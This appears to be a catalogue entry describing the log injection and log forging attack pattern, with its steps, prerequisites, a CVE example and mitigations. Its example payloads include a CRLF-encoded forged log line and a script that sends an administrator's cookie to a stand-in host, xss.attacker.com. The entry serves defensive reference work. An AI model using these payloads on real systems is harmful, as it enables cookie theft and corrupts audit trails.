This attack targets the log files of the target host. The attacker
injects, manipulates or forges malicious log entries in the log file,
allowing him to mislead a log audit, cover traces of attack, or perform
other malicious actions. The target host is not properly controlling log
access. As a result tainted data is resulting in the log files leading to a
failure in accoutability, non-repudiation and incident forensics
capability.
Attack Execution Flow
Explore
Determine Application's Log File
Format:
The first step is exploratory meaning the attacker
observes the system. The attacker looks for action
and data that are likely to be logged. The attacker
may be familiar with the log format of the
system.
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Determine logging utility being used by
application (e.g. log4j)
env-All
2
Gain access to application's source code to
determine log file formats.
env-All
3
Install or obtain access to instance of
application and observe its log file
format.
env-All
Outcomes
ID
Type
Outcome Description
1
Success
Attacker determines log file
format used by application.
2
Inconclusive
Attacker cannot conclusively
determine log file format; he/she can only guess
what the format is.
Exploit
Manipulate Log Files:
The attacker alters the log contents either
directly through manipulation or forging or
indirectly through injection of specially crafted
input that the target software will write to the
logs. This type of attack typically follows another
attack and is used to try to cover the traces of the
previous attack.
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Use carriage return and/or line feed
characters to start a new line in the log file,
and then, add a fake entry. For example:
"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in"
may add the following forged entry into a log
file: "[Thu Nov 12 12:11:22]:Info: User admin
logged in". Different applications may require
different encodings of the carriage return and
line feed characters.
env-All
2
Insert a script into the log file such that
if it is viewed using a web browser, the attacker
will get a copy of the operator/administrator's
cookie and will be able to gain access as that
user. For example, a log file entry could contain
<script>new
Image().src="http://xss.attacker.com/log_cookie?cookie="+encodeURI(document.cookie);</script>.
The script itself will be invisible to anybody
viewing the logs in a web browser (unless they
view the source for the page).
env-All
Outcomes
ID
Type
Outcome Description
1
Success
Forged entry or other malicious
data inserted into application's
logs.
2
Failure
No entry inserted into logs, or
the entry is visibly distinguishable from real
entries.
Security Controls
ID
Type
Security Control Description
1
Preventative
Input validation to
ensure that only legal characters supplied by
users can be entered into log
files
2
Preventative
Encode information
from user such that any unexpected characters are
encoded safely before they are entered into log
files.
3
Preventative
Post-processing of log
files to remove or encode dangerous characters
before displaying to a user may help in some
cases. It will not help remove fake log entries
entered using carriage return and line feed
characters,
however.
Attack Prerequisites
The target host is logging the action and data of the user.
The target host insufficiently protects acces to the logs or loggin
mechanisms.
Typical Likelihood of Exploit
Likelihood: High
Methods of Attack
Analysis
Modification of Resources
Injection
Examples-Instances
Description
Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP
Toolkit) 0.50, and possibly earlier versions, allows remote attackers to
enter false payment entries into the log file via HTTP POST requests to
ipn_success.php.
Related Vulnerabilities
CVE-2006-0201
Description
If a user submits the string "twenty-one" for val, the following entry
is logged: INFO: Failed to parse val=twenty-one However, if an attacker
submits the string "twenty-one%0a%0aINFO:+User+logged+out%3dbadguy", the
following entry is logged: INFO: Failed to parse val=twenty-one INFO:
User logged out=badguy Clearly, attackers can use this same mechanism to
insert arbitrary log entries. (Source: CWE Log forging)
Attacker Skills or Knowledge Required
Skill or Knowledge Level: Low
This attack can be as simple as adding extra characters to the logged
data (e.g. unsername). Adding entries is typically easier than removing
entries.
Skill or Knowledge Level: Medium
A more sophisticated attack can try to defeat the input validation
mechanism.
Probing Techniques
Description
The attacker will try to determine which data may be logged in case of
a success or failure of a predetermined action such as authentication.
Once that data has been identified, the attacker may try to craft
malicious data to inject.
Description
Vulnerability testing tool can be used to test the input validation
mechanism.
Solutions and Mitigations
Carefully control access to physical log files.
Do not allow tainted data to be written in the log file without prior
input validation. Whitelisting may be used to properly validate the
data.
Use synchronization to control the flow of execution.
Use static analysis tools to identify log forging vulnerabilities.
Avoid viewing logs with tools that may interpret control characters in the
file, such as command-line shells.
Attack Motivation-Consequences
Scope
Technical Impact
Note
Integrity
Modify application
data
Injection Vector
The variable being logged
Payload
The malicious characters or the crafted data which should forge the log
entry.
Activation Zone
The logging mechanism (This can be as simple as writing to a file, logging
API, etc.)
Description
